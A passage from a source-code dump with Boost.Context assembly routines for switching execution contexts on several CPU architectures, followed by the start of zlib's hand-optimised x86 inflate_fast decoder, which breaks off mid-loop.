stfpc FPC_OFFSET(%r2)
/* Store the address of the target function as new pc. */
stg %r4,PC_OFFSET(%r2)
/* Store a pointer to the finish routine as r14. If a function
called via context routines just returns that value will be
loaded and used as return address. Hence the program will
just exit. */
larl %r1,finish
stg %r1,R14_OFFSET(%r2)
/* Return as usual with the new context returned in r2. */
br %r14
finish:
/* Entered when the context-function returns: call _exit(0). */
lghi %r2,0
brasl %r14,_exit@PLT
.size make_fcontext,.-make_fcontext
.section .note.GNU-stack,"",%progbits
|
Aidam7/PHavirP
| 3,306
|
Zend/asm/jump_x86_64_sysv_macho_gas.S
|
/*
Copyright Oliver Kowalke 2009.
Distributed under the Boost Software License, Version 1.0.
(See accompanying file LICENSE_1_0.txt or copy at
http://www.boost.org/LICENSE_1_0.txt)
*/
/****************************************************************************************
* *
* ---------------------------------------------------------------------------------- *
* | 0 | 1 | 2 | 3 | 4 | 5 | 6 | 7 | *
* ---------------------------------------------------------------------------------- *
* | 0x0 | 0x4 | 0x8 | 0xc | 0x10 | 0x14 | 0x18 | 0x1c | *
* ---------------------------------------------------------------------------------- *
* | fc_mxcsr|fc_x87_cw| R12 | R13 | R14 | *
* ---------------------------------------------------------------------------------- *
* ---------------------------------------------------------------------------------- *
* | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | *
* ---------------------------------------------------------------------------------- *
* | 0x20 | 0x24 | 0x28 | 0x2c | 0x30 | 0x34 | 0x38 | 0x3c | *
* ---------------------------------------------------------------------------------- *
* | R15 | RBX | RBP | RIP | *
* ---------------------------------------------------------------------------------- *
* *
****************************************************************************************/
.text
.globl _jump_fcontext
.align 8
_jump_fcontext:
/* transfer_t jump_fcontext( fcontext_t const to, void * vp );
   x86_64 Mach-O, SysV AMD64 ABI: RDI = target fcontext, RSI = data.
   Saves the callee-saved registers (+ mxcsr/x87 control word) on the
   current stack, swaps RSP with the target context-data pointer,
   restores that context's registers and jumps to its saved return
   address with transfer_t in RAX:RDX (return) and RDI:RSI (args). */
leaq -0x38(%rsp), %rsp /* prepare stack */
#if !defined(BOOST_USE_TSX)
stmxcsr (%rsp) /* save MMX control- and status-word */
fnstcw 0x4(%rsp) /* save x87 control-word */
#endif
movq %r12, 0x8(%rsp) /* save R12 */
movq %r13, 0x10(%rsp) /* save R13 */
movq %r14, 0x18(%rsp) /* save R14 */
movq %r15, 0x20(%rsp) /* save R15 */
movq %rbx, 0x28(%rsp) /* save RBX */
movq %rbp, 0x30(%rsp) /* save RBP */
/* store RSP (pointing to context-data) in RAX */
movq %rsp, %rax
/* restore RSP (pointing to context-data) from RDI */
movq %rdi, %rsp
movq 0x38(%rsp), %r8 /* restore return-address */
#if !defined(BOOST_USE_TSX)
ldmxcsr (%rsp) /* restore MMX control- and status-word */
fldcw 0x4(%rsp) /* restore x87 control-word */
#endif
movq 0x8(%rsp), %r12 /* restore R12 */
movq 0x10(%rsp), %r13 /* restore R13 */
movq 0x18(%rsp), %r14 /* restore R14 */
movq 0x20(%rsp), %r15 /* restore R15 */
movq 0x28(%rsp), %rbx /* restore RBX */
movq 0x30(%rsp), %rbp /* restore RBP */
leaq 0x40(%rsp), %rsp /* prepare stack */
/* return transfer_t from jump */
/* RAX == fctx, RDX == data */
movq %rsi, %rdx
/* pass transfer_t as first arg in context function */
/* RDI == fctx, RSI == data */
movq %rax, %rdi
/* indirect jump to context */
jmp *%r8
|
Aidam7/PHavirP
| 6,059
|
Zend/asm/jump_ppc32_sysv_xcoff_gas.S
|
/*
Copyright Oliver Kowalke 2009.
Distributed under the Boost Software License, Version 1.0.
(See accompanying file LICENSE_1_0.txt or copy at
http://www.boost.org/LICENSE_1_0.txt)
*/
/*******************************************************
* *
* ------------------------------------------------- *
* | 0 | 4 | 8 | 12 | 16 | 20 | 24 | 28 | *
* ------------------------------------------------- *
* |bchai| CR | LR |compl| link| TOC | R14 | R15 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 32 | 36 | 40 | 44 | 48 | 52 | 56 | 60 | *
* ------------------------------------------------- *
* | R16 | R17 | R18 | R19 | R20 | R21 | R22 | R23 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 64 | 68 | 72 | 76 | 80 | 84 | 88 | 92 | *
* ------------------------------------------------- *
* | R24 | R25 | R26 | R27 | R28 | R29 | R30 | R31 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 96 | 100 | 104 | 108 | 112 | 116 | 120 | 124 | *
* ------------------------------------------------- *
* | F14 | F15 | F16 | F17 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 128 | 132 | 136 | 140 | 144 | 148 | 152 | 156 | *
* ------------------------------------------------- *
* | F18 | F19 | F20 | F21 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 160 | 164 | 168 | 172 | 176 | 180 | 184 | 188 | *
* ------------------------------------------------- *
* | F22 | F23 | F24 | F25 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 192 | 196 | 200 | 204 | 208 | 212 | 216 | 220 | *
* ------------------------------------------------- *
* | F26 | F27 | F28 | F29 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 224 | 228 | 232 | 236 | 240 | 244 | 248 | 252 | *
* ------------------------------------------------- *
* | F30 | F31 | PC |hiddn| fpscr | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 256 | 260 | 264 | 268 | 272 | 276 | 280 | 284 | *
* ------------------------------------------------- *
* |bchai|savCR|savLR|compl| link|svTOC| FCTX| DATA| *
* ------------------------------------------------- *
* *
*******************************************************/
.file "jump_ppc32_sysv_xcoff_gas.S"
# transfer_t jump_fcontext( fcontext_t const to, void * vp )
# PPC32 XCOFF (AIX): R3 = hidden pointer for the returned transfer_t,
# R4 = target fcontext, R5 = data.
# Saves CR, LR, TOC, R14-R31, F14-F31 and FPSCR into the reserved
# area below R1, switches R1 to the target context-data and branches
# to the restored PC through CTR.
# Fix: the first-jump test used cmpdi (doubleword compare), which is
# a 64-bit-only instruction; this is a 32-bit file (4-byte slots,
# stw/lwz throughout), so the word compare cmpwi is required.
.toc
.csect .text[PR], 5
.globl jump_fcontext[DS]
.globl .jump_fcontext
.csect jump_fcontext[DS]
jump_fcontext:
.long .jump_fcontext[PR], TOC[tc0], 0
.csect .text[PR], 5
.jump_fcontext:
# reserve space on stack
subi 1, 1, 256
# save CR
mfcr 0
stw 0, 4(1)
# save LR
mflr 0
stw 0, 8(1)
# save LR as PC
stw 0, 240(1)
# save TOC
stw 2, 20(1)
# Save registers R14 to R31.
stw 14, 24(1)
stw 15, 28(1)
stw 16, 32(1)
stw 17, 36(1)
stw 18, 40(1)
stw 19, 44(1)
stw 20, 48(1)
stw 21, 52(1)
stw 22, 56(1)
stw 23, 60(1)
stw 24, 64(1)
stw 25, 68(1)
stw 26, 72(1)
stw 27, 76(1)
stw 28, 80(1)
stw 29, 84(1)
stw 30, 88(1)
stw 31, 92(1)
# Save registers F14 to F31 in slots with 8-byte alignment.
# 4-byte alignment may stall the pipeline of some processors.
# Less than 4 may cause alignment traps.
stfd 14, 96(1)
stfd 15, 104(1)
stfd 16, 112(1)
stfd 17, 120(1)
stfd 18, 128(1)
stfd 19, 136(1)
stfd 20, 144(1)
stfd 21, 152(1)
stfd 22, 160(1)
stfd 23, 168(1)
stfd 24, 176(1)
stfd 25, 184(1)
stfd 26, 192(1)
stfd 27, 200(1)
stfd 28, 208(1)
stfd 29, 216(1)
stfd 30, 224(1)
stfd 31, 232(1)
# hidden pointer
stw 3, 244(1)
mffs 0 # load FPSCR
stfd 0, 248(1) # save FPSCR
# store RSP (pointing to context-data) in R6
mr 6, 1
# restore RSP (pointing to context-data) from R4
mr 1, 4
# restore CR
lwz 0, 4(1)
mtcr 0
# restore LR
lwz 0, 8(1)
mtlr 0
# load PC
lwz 0, 240(1)
mtctr 0
# restore TOC
lwz 2, 20(1)
# restore R14 to R31
lwz 14, 24(1)
lwz 15, 28(1)
lwz 16, 32(1)
lwz 17, 36(1)
lwz 18, 40(1)
lwz 19, 44(1)
lwz 20, 48(1)
lwz 21, 52(1)
lwz 22, 56(1)
lwz 23, 60(1)
lwz 24, 64(1)
lwz 25, 68(1)
lwz 26, 72(1)
lwz 27, 76(1)
lwz 28, 80(1)
lwz 29, 84(1)
lwz 30, 88(1)
lwz 31, 92(1)
# restore F14 to F31
lfd 14, 96(1)
lfd 15, 104(1)
lfd 16, 112(1)
lfd 17, 120(1)
lfd 18, 128(1)
lfd 19, 136(1)
lfd 20, 144(1)
lfd 21, 152(1)
lfd 22, 160(1)
lfd 23, 168(1)
lfd 24, 176(1)
lfd 25, 184(1)
lfd 26, 192(1)
lfd 27, 200(1)
lfd 28, 208(1)
lfd 29, 216(1)
lfd 30, 224(1)
lfd 31, 232(1)
# hidden pointer
lwz 3, 244(1)
lfd 0, 248(1) # load FPSCR
mtfsf 0xff, 0 # restore FPSCR
# adjust stack
addi 1, 1, 256
# zero in r3 indicates first jump to context-function
# (word compare: this is a 32-bit ABI, cmpdi would be invalid here)
cmpwi 3, 0
beq use_entry_arg
# return transfer_t
stw 6, 0(3)
stw 5, 4(3)
# jump to context
bctr
use_entry_arg:
# copy transfer_t into transfer_fn arg registers
mr 3, 6
mr 4, 5
# jump to context
bctr
|
Aidam7/PHavirP
| 3,788
|
Zend/asm/jump_i386_sysv_elf_gas.S
|
/*
Copyright Oliver Kowalke 2009.
Distributed under the Boost Software License, Version 1.0.
(See accompanying file LICENSE_1_0.txt or copy at
http://www.boost.org/LICENSE_1_0.txt)
*/
/****************************************************************************************
* *
* ---------------------------------------------------------------------------------- *
* | 0 | 1 | 2 | 3 | 4 | 5 | 6 | 7 | *
* ---------------------------------------------------------------------------------- *
* | 0x0 | 0x4 | 0x8 | 0xc | 0x10 | 0x14 | 0x18 | 0x1c | *
* ---------------------------------------------------------------------------------- *
* | fc_mxcsr|fc_x87_cw| guard | EDI | ESI | EBX | EBP | EIP | *
* ---------------------------------------------------------------------------------- *
* ---------------------------------------------------------------------------------- *
* | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | *
* ---------------------------------------------------------------------------------- *
* | 0x20 | 0x24 | 0x28 | | *
* ---------------------------------------------------------------------------------- *
* | hidden | to | data | | *
* ---------------------------------------------------------------------------------- *
* *
****************************************************************************************/
.file "jump_i386_sysv_elf_gas.S"
/* transfer_t jump_fcontext( fcontext_t const to, void * vp );
   i386 SysV ELF, cdecl with hidden struct-return pointer:
   at entry 0x4(%esp) = hidden transfer_t*, 0x8 = target fcontext,
   0xc = data (0x20/0x24/0x28 after the 0x1c-byte stack reservation).
   Saves EDI/ESI/EBX/EBP (+ mxcsr/x87 control word, optional TLS
   stack guard), switches ESP to the target context-data, writes the
   transfer_t through the resumed context's hidden pointer and jumps
   to the restored EIP. */
.text
.globl jump_fcontext
.align 2
.type jump_fcontext,@function
jump_fcontext:
leal -0x1c(%esp), %esp /* prepare stack */
#if !defined(BOOST_USE_TSX)
stmxcsr (%esp) /* save MMX control- and status-word */
fnstcw 0x4(%esp) /* save x87 control-word */
#endif
#if defined(BOOST_CONTEXT_TLS_STACK_PROTECTOR)
movl %gs:0x14, %ecx /* read stack guard from TLS record */
movl %ecx, 0x8(%esp) /* save stack guard */
#endif
movl %edi, 0xc(%esp) /* save EDI */
movl %esi, 0x10(%esp) /* save ESI */
movl %ebx, 0x14(%esp) /* save EBX */
movl %ebp, 0x18(%esp) /* save EBP */
/* store ESP (pointing to context-data) in ECX */
movl %esp, %ecx
/* first arg of jump_fcontext() == fcontext to jump to */
movl 0x24(%esp), %eax
/* second arg of jump_fcontext() == data to be transferred */
movl 0x28(%esp), %edx
/* restore ESP (pointing to context-data) from EAX */
movl %eax, %esp
/* address of returned transport_t */
/* (read from the resumed context's own hidden-pointer slot) */
movl 0x20(%esp), %eax
/* return parent fcontext_t */
movl %ecx, (%eax)
/* return data */
movl %edx, 0x4(%eax)
movl 0x1c(%esp), %ecx /* restore EIP */
#if !defined(BOOST_USE_TSX)
ldmxcsr (%esp) /* restore MMX control- and status-word */
fldcw 0x4(%esp) /* restore x87 control-word */
#endif
#if defined(BOOST_CONTEXT_TLS_STACK_PROTECTOR)
movl 0x8(%esp), %edx /* load stack guard */
movl %edx, %gs:0x14 /* restore stack guard to TLS record */
#endif
movl 0xc(%esp), %edi /* restore EDI */
movl 0x10(%esp), %esi /* restore ESI */
movl 0x14(%esp), %ebx /* restore EBX */
movl 0x18(%esp), %ebp /* restore EBP */
leal 0x24(%esp), %esp /* prepare stack */
/* jump to context */
jmp *%ecx
.size jump_fcontext,.-jump_fcontext
/* Mark that we don't need executable stack. */
.section .note.GNU-stack,"",%progbits
/* ==== repository-dump separator: Aidam7/PHavirP | 6,155 bytes
   next file: Zend/asm/make_ppc64_sysv_elf_gas.S ==== */
/*
Copyright Oliver Kowalke 2009.
Distributed under the Boost Software License, Version 1.0.
(See accompanying file LICENSE_1_0.txt or copy at
http://www.boost.org/LICENSE_1_0.txt)
*/
/*******************************************************
* *
* ------------------------------------------------- *
* | 0 | 1 | 2 | 3 | 4 | 5 | 6 | 7 | *
* ------------------------------------------------- *
* | 0 | 4 | 8 | 12 | 16 | 20 | 24 | 28 | *
* ------------------------------------------------- *
* | TOC | R14 | R15 | R16 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | *
* ------------------------------------------------- *
* | 32 | 36 | 40 | 44 | 48 | 52 | 56 | 60 | *
* ------------------------------------------------- *
* | R17 | R18 | R19 | R20 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | *
* ------------------------------------------------- *
* | 64 | 68 | 72 | 76 | 80 | 84 | 88 | 92 | *
* ------------------------------------------------- *
* | R21 | R22 | R23 | R24 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | *
* ------------------------------------------------- *
* | 96 | 100 | 104 | 108 | 112 | 116 | 120 | 124 | *
* ------------------------------------------------- *
* | R25 | R26 | R27 | R28 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | *
* ------------------------------------------------- *
* | 128 | 132 | 136 | 140 | 144 | 148 | 152 | 156 | *
* ------------------------------------------------- *
* | R29 | R30 | R31 | hidden | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | *
* ------------------------------------------------- *
* | 160 | 164 | 168 | 172 | 176 | 180 | 184 | 188 | *
* ------------------------------------------------- *
* | CR | LR | PC | back-chain| *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 48 | 49 | 50 | 51 | 52 | 53 | 54 | 55 | *
* ------------------------------------------------- *
* | 192 | 196 | 200 | 204 | 208 | 212 | 216 | 220 | *
* ------------------------------------------------- *
* | cr saved | lr saved | compiler | linker | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | *
* ------------------------------------------------- *
* | 224 | 228 | 232 | 236 | 240 | 244 | 248 | 252 | *
* ------------------------------------------------- *
* | TOC saved | FCTX | DATA | | *
* ------------------------------------------------- *
* *
*******************************************************/
.file "make_ppc64_sysv_elf_gas.S"
.globl make_fcontext
# fcontext_t make_fcontext( void * sp, size_t size, void (* fn)( transfer_t) );
# In:  R3 = top of the context-stack, R5 = context-function
#      (R4, the stack size, is overwritten below without being read)
# Out: R3 = pointer to the freshly initialized context-data record
# Emits the ELFv2 (global+local entry) or ELFv1 (function descriptor)
# prologue depending on _CALL_ELF; the record layout is in the header.
#if _CALL_ELF == 2
.text
.align 2
make_fcontext:
addis %r2, %r12, .TOC.-make_fcontext@ha
addi %r2, %r2, .TOC.-make_fcontext@l
.localentry make_fcontext, . - make_fcontext
#else
.section ".opd","aw"
.align 3
make_fcontext:
# ifdef _CALL_LINUX
.quad .L.make_fcontext,.TOC.@tocbase,0
.type make_fcontext,@function
.text
.align 2
.L.make_fcontext:
# else
.hidden .make_fcontext
.globl .make_fcontext
.quad .make_fcontext,.TOC.@tocbase,0
.size make_fcontext,24
.type .make_fcontext,@function
.text
.align 2
.make_fcontext:
# endif
#endif
# save return address into R6
mflr %r6
# first arg of make_fcontext() == top address of context-stack
# shift address in R3 to lower 16 byte boundary
clrrdi %r3, %r3, 4
# reserve space for context-data on context-stack
# including 64 byte of linkage + parameter area (R1 % 16 == 0)
subi %r3, %r3, 248
# third arg of make_fcontext() == address of context-function
# entry point (ELFv2) or descriptor (ELFv1)
#if _CALL_ELF == 2
# save address of context-function entry point
std %r5, 176(%r3)
#else
# save address of context-function entry point
ld %r4, 0(%r5)
std %r4, 176(%r3)
# save TOC of context-function
ld %r4, 8(%r5)
std %r4, 0(%r3)
#endif
# set back-chain to zero
li %r0, 0
std %r0, 184(%r3)
#if _CALL_ELF != 2
# zero in r3 indicates first jump to context-function
std %r0, 152(%r3)
#endif
# load LR
mflr %r0
# jump to label 1; the bl/mflr pair materializes the current PC so the
# absolute address of 'finish' can be computed position-independently
bl 1f
1:
# load LR into R4
mflr %r4
# compute abs address of label finish
addi %r4, %r4, finish - 1b
# restore LR
mtlr %r0
# save address of finish as return-address for context-function
# will be entered after context-function returns
std %r4, 168(%r3)
# restore return address from R6
mtlr %r6
blr # return pointer to context-data
finish:
# reached only if the context-function returns: terminate the process
# save return address into R0
mflr %r0
# save return address on stack, set up stack frame
std %r0, 8(%r1)
# allocate stack space, R1 % 16 == 0
stdu %r1, -32(%r1)
# exit code is zero
li %r3, 0
# exit application
bl _exit
nop
#if _CALL_ELF == 2
.size make_fcontext, .-make_fcontext
#else
# ifdef _CALL_LINUX
.size .make_fcontext, .-.L.make_fcontext
# else
.size .make_fcontext, .-.make_fcontext
# endif
#endif
/* Mark that we don't need executable stack. */
.section .note.GNU-stack,"",%progbits
/* ==== repository-dump separator: aiekick/Lumo | 42,842 bytes
   next file: 3rdparty/assimp/contrib/zlib/contrib/inflate86/inffast.S ==== */
/*
* inffast.S is a hand tuned assembler version of:
*
* inffast.c -- fast decoding
* Copyright (C) 1995-2003 Mark Adler
* For conditions of distribution and use, see copyright notice in zlib.h
*
* Copyright (C) 2003 Chris Anderson <christop@charm.net>
* Please use the copyright conditions above.
*
* This version (Jan-23-2003) of inflate_fast was coded and tested under
* GNU/Linux on a pentium 3, using the gcc-3.2 compiler distribution. On that
* machine, I found that gzip style archives decompressed about 20% faster than
* the gcc-3.2 -O3 -fomit-frame-pointer compiled version. Your results will
* depend on how large of a buffer is used for z_stream.next_in & next_out
* (8K-32K worked best for my 256K cpu cache) and how much overhead there is in
 * stream processing I/O and crc32/adler32. In my case, this routine used
* 70% of the cpu time and crc32 used 20%.
*
* I am confident that this version will work in the general case, but I have
* not tested a wide variety of datasets or a wide variety of platforms.
*
* Jan-24-2003 -- Added -DUSE_MMX define for slightly faster inflating.
* It should be a runtime flag instead of compile time flag...
*
* Jan-26-2003 -- Added runtime check for MMX support with cpuid instruction.
* With -DUSE_MMX, only MMX code is compiled. With -DNO_MMX, only non-MMX code
* is compiled. Without either option, runtime detection is enabled. Runtime
 * detection should work on all modern cpus and the recommended algorithm (flip
* ID bit on eflags and then use the cpuid instruction) is used in many
* multimedia applications. Tested under win2k with gcc-2.95 and gas-2.12
* distributed with cygwin3. Compiling with gcc-2.95 -c inffast.S -o
* inffast.obj generates a COFF object which can then be linked with MSVC++
* compiled code. Tested under FreeBSD 4.7 with gcc-2.95.
*
* Jan-28-2003 -- Tested Athlon XP... MMX mode is slower than no MMX (and
* slower than compiler generated code). Adjusted cpuid check to use the MMX
* code only for Pentiums < P4 until I have more data on the P4. Speed
 * improvement is only about 15% on the Athlon when compared with code generated
* with MSVC++. Not sure yet, but I think the P4 will also be slower using the
* MMX mode because many of it's x86 ALU instructions execute in .5 cycles and
* have less latency than MMX ops. Added code to buffer the last 11 bytes of
* the input stream since the MMX code grabs bits in chunks of 32, which
* differs from the inffast.c algorithm. I don't think there would have been
* read overruns where a page boundary was crossed (a segfault), but there
 * could have been overruns when next_in ends on unaligned memory (uninitialized
* memory read).
*
* Mar-13-2003 -- P4 MMX is slightly slower than P4 NO_MMX. I created a C
* version of the non-MMX code so that it doesn't depend on zstrm and zstate
* structure offsets which are hard coded in this file. This was last tested
* with zlib-1.2.0 which is currently in beta testing, newer versions of this
* and inffas86.c can be found at http://www.eetbeetee.com/zlib/ and
* http://www.charm.net/~christop/zlib/
*/
/*
* if you have underscore linking problems (_inflate_fast undefined), try
* using -DGAS_COFF
*/
/* Select the object format when neither was forced on the command line:
 * COFF (underscored externals) on Windows/Cygwin, ELF elsewhere. */
#if ! defined( GAS_COFF ) && ! defined( GAS_ELF )
#if defined( WIN32 ) || defined( __CYGWIN__ )
#define GAS_COFF /* windows object format */
#else
#define GAS_ELF
#endif
#endif /* ! GAS_COFF && ! GAS_ELF */
#if defined( GAS_COFF )
/* coff externals have underscores */
#define inflate_fast _inflate_fast
#define inflate_fast_use_mmx _inflate_fast_use_mmx
#endif /* GAS_COFF */
.file "inffast.S"
.globl inflate_fast
.text
/* Error-message strings; presumably stored into strm->msg on the failure
 * paths further down in inflate_fast — confirm against the BAD-state code. */
.align 4,0
.L_invalid_literal_length_code_msg:
.string "invalid literal/length code"
.align 4,0
.L_invalid_distance_code_msg:
.string "invalid distance code"
.align 4,0
.L_invalid_distance_too_far_msg:
.string "invalid distance too far back"
#if ! defined( NO_MMX )
/* Bit-mask lookup table used by the MMX paths to extract the low N bits
 * of the bit accumulator (indexed by operation bit-length). */
.align 4,0
.L_mask: /* mask[N] = ( 1 << N ) - 1 */
.long 0
.long 1
.long 3
.long 7
.long 15
.long 31
.long 63
.long 127
.long 255
.long 511
.long 1023
.long 2047
.long 4095
.long 8191
.long 16383
.long 32767
.long 65535
.long 131071
.long 262143
.long 524287
.long 1048575
.long 2097151
.long 4194303
.long 8388607
.long 16777215
.long 33554431
.long 67108863
.long 134217727
.long 268435455
.long 536870911
.long 1073741823
.long 2147483647
.long 4294967295
#endif /* NO_MMX */
.text
/*
 * struct z_stream offsets, in zlib.h
 * NOTE(review): these offsets (and the inflate_state ones below) are
 * hard-coded against the zlib-1.2.0 struct layouts, as the file header
 * states — they must be re-checked when moving to a newer zlib.
 */
#define next_in_strm 0 /* strm->next_in */
#define avail_in_strm 4 /* strm->avail_in */
#define next_out_strm 12 /* strm->next_out */
#define avail_out_strm 16 /* strm->avail_out */
#define msg_strm 24 /* strm->msg */
#define state_strm 28 /* strm->state */
/*
 * struct inflate_state offsets, in inflate.h
 */
#define mode_state 0 /* state->mode */
#define wsize_state 32 /* state->wsize */
#define write_state 40 /* state->write */
#define window_state 44 /* state->window */
#define hold_state 48 /* state->hold */
#define bits_state 52 /* state->bits */
#define lencode_state 68 /* state->lencode */
#define distcode_state 72 /* state->distcode */
#define lenbits_state 76 /* state->lenbits */
#define distbits_state 80 /* state->distbits */
/*
 * inflate_fast's activation record
 * (stack offsets assume the pushes/pushf done in the prologue; see below)
 */
#define local_var_size 64 /* how much local space for vars */
#define strm_sp 88 /* first arg: z_stream * (local_var_size + 24) */
#define start_sp 92 /* second arg: unsigned int (local_var_size + 28) */
/*
 * offsets for local vars on stack
 */
#define out 60 /* unsigned char* */
#define window 56 /* unsigned char* */
#define wsize 52 /* unsigned int */
#define write 48 /* unsigned int */
#define in 44 /* unsigned char* */
#define beg 40 /* unsigned char* */
#define buf 28 /* char[ 12 ] */
#define len 24 /* unsigned int */
#define last 20 /* unsigned char* */
#define end 16 /* unsigned char* */
#define dcode 12 /* code* */
#define lcode 8 /* code* */
#define dmask 4 /* unsigned int */
#define lmask 0 /* unsigned int */
/*
 * typedef enum inflate_mode consts, in inflate.h
 */
#define INFLATE_MODE_TYPE 11 /* state->mode flags enum-ed in inflate.h */
#define INFLATE_MODE_BAD 26
/* With neither USE_MMX nor NO_MMX forced, the MMX path is chosen at run
 * time via the flag variable below (1 = detect via cpuid, 2 = use MMX,
 * 3 = don't use MMX). */
#if ! defined( USE_MMX ) && ! defined( NO_MMX )
#define RUN_TIME_MMX
#define CHECK_MMX 1
#define DO_USE_MMX 2
#define DONT_USE_MMX 3
.globl inflate_fast_use_mmx
.data
.align 4,0
inflate_fast_use_mmx: /* integer flag for run time control 1=check,2=mmx,3=no */
.long CHECK_MMX
#if defined( GAS_ELF )
/* elf info */
.type inflate_fast_use_mmx,@object
.size inflate_fast_use_mmx,4
#endif
#endif /* RUN_TIME_MMX */
#if defined( GAS_COFF )
/* coff info: scl 2 = extern, type 32 = function */
.def inflate_fast; .scl 2; .type 32; .endef
#endif
.text
.align 32,0x90
inflate_fast:
pushl %edi
pushl %esi
pushl %ebp
pushl %ebx
pushf /* save eflags (strm_sp, state_sp assumes this is 32 bits) */
subl $local_var_size, %esp
cld
#define strm_r %esi
#define state_r %edi
movl strm_sp(%esp), strm_r
movl state_strm(strm_r), state_r
/* in = strm->next_in;
* out = strm->next_out;
* last = in + strm->avail_in - 11;
* beg = out - (start - strm->avail_out);
* end = out + (strm->avail_out - 257);
*/
movl avail_in_strm(strm_r), %edx
movl next_in_strm(strm_r), %eax
addl %eax, %edx /* avail_in += next_in */
subl $11, %edx /* avail_in -= 11 */
movl %eax, in(%esp)
movl %edx, last(%esp)
movl start_sp(%esp), %ebp
movl avail_out_strm(strm_r), %ecx
movl next_out_strm(strm_r), %ebx
subl %ecx, %ebp /* start -= avail_out */
negl %ebp /* start = -start */
addl %ebx, %ebp /* start += next_out */
subl $257, %ecx /* avail_out -= 257 */
addl %ebx, %ecx /* avail_out += out */
movl %ebx, out(%esp)
movl %ebp, beg(%esp)
movl %ecx, end(%esp)
/* wsize = state->wsize;
* write = state->write;
* window = state->window;
* hold = state->hold;
* bits = state->bits;
* lcode = state->lencode;
* dcode = state->distcode;
* lmask = ( 1 << state->lenbits ) - 1;
* dmask = ( 1 << state->distbits ) - 1;
*/
movl lencode_state(state_r), %eax
movl distcode_state(state_r), %ecx
movl %eax, lcode(%esp)
movl %ecx, dcode(%esp)
movl $1, %eax
movl lenbits_state(state_r), %ecx
shll %cl, %eax
decl %eax
movl %eax, lmask(%esp)
movl $1, %eax
movl distbits_state(state_r), %ecx
shll %cl, %eax
decl %eax
movl %eax, dmask(%esp)
movl wsize_state(state_r), %eax
movl write_state(state_r), %ecx
movl window_state(state_r), %edx
movl %eax, wsize(%esp)
movl %ecx, write(%esp)
movl %edx, window(%esp)
movl hold_state(state_r), %ebp
movl bits_state(state_r), %ebx
#undef strm_r
#undef state_r
#define in_r %esi
#define from_r %esi
#define out_r %edi
movl in(%esp), in_r
movl last(%esp), %ecx
cmpl in_r, %ecx
ja .L_align_long /* if in < last */
addl $11, %ecx /* ecx = &in[ avail_in ] */
subl in_r, %ecx /* ecx = avail_in */
movl $12, %eax
subl %ecx, %eax /* eax = 12 - avail_in */
leal buf(%esp), %edi
rep movsb /* memcpy( buf, in, avail_in ) */
movl %eax, %ecx
xorl %eax, %eax
rep stosb /* memset( &buf[ avail_in ], 0, 12 - avail_in ) */
leal buf(%esp), in_r /* in = buf */
movl in_r, last(%esp) /* last = in, do just one iteration */
jmp .L_is_aligned
/* align in_r on long boundary */
.L_align_long:
testl $3, in_r
jz .L_is_aligned
xorl %eax, %eax
movb (in_r), %al
incl in_r
movl %ebx, %ecx
addl $8, %ebx
shll %cl, %eax
orl %eax, %ebp
jmp .L_align_long
.L_is_aligned:
movl out(%esp), out_r
#if defined( NO_MMX )
jmp .L_do_loop
#endif
#if defined( USE_MMX )
jmp .L_init_mmx
#endif
/*** Runtime MMX check ***/
#if defined( RUN_TIME_MMX )
.L_check_mmx:
cmpl $DO_USE_MMX, inflate_fast_use_mmx
je .L_init_mmx
ja .L_do_loop /* > 2 */
pushl %eax
pushl %ebx
pushl %ecx
pushl %edx
pushf
movl (%esp), %eax /* copy eflags to eax */
xorl $0x200000, (%esp) /* try toggling ID bit of eflags (bit 21)
* to see if cpu supports cpuid...
* ID bit method not supported by NexGen but
* bios may load a cpuid instruction and
* cpuid may be disabled on Cyrix 5-6x86 */
popf
pushf
popl %edx /* copy new eflags to edx */
xorl %eax, %edx /* test if ID bit is flipped */
jz .L_dont_use_mmx /* not flipped if zero */
xorl %eax, %eax
cpuid
cmpl $0x756e6547, %ebx /* check for GenuineIntel in ebx,ecx,edx */
jne .L_dont_use_mmx
cmpl $0x6c65746e, %ecx
jne .L_dont_use_mmx
cmpl $0x49656e69, %edx
jne .L_dont_use_mmx
movl $1, %eax
cpuid /* get cpu features */
shrl $8, %eax
andl $15, %eax
cmpl $6, %eax /* check for Pentium family, is 0xf for P4 */
jne .L_dont_use_mmx
testl $0x800000, %edx /* test if MMX feature is set (bit 23) */
jnz .L_use_mmx
jmp .L_dont_use_mmx
.L_use_mmx:
movl $DO_USE_MMX, inflate_fast_use_mmx
jmp .L_check_mmx_pop
.L_dont_use_mmx:
movl $DONT_USE_MMX, inflate_fast_use_mmx
.L_check_mmx_pop:
popl %edx
popl %ecx
popl %ebx
popl %eax
jmp .L_check_mmx
#endif
/*** Non-MMX code ***/
#if defined ( NO_MMX ) || defined( RUN_TIME_MMX )
#define hold_r %ebp
#define bits_r %bl
#define bitslong_r %ebx
.align 32,0x90
.L_while_test:
/* while (in < last && out < end)
*/
cmpl out_r, end(%esp)
jbe .L_break_loop /* if (out >= end) */
cmpl in_r, last(%esp)
jbe .L_break_loop
.L_do_loop:
/* regs: %esi = in, %ebp = hold, %bl = bits, %edi = out
*
* do {
* if (bits < 15) {
* hold |= *((unsigned short *)in)++ << bits;
* bits += 16
* }
* this = lcode[hold & lmask]
*/
cmpb $15, bits_r
ja .L_get_length_code /* if (15 < bits) */
